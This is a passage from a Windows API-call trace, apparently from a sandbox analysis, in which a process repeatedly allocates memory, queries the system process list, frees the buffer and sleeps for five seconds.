returned 0x0 [0160.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.190] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.201] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.245] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 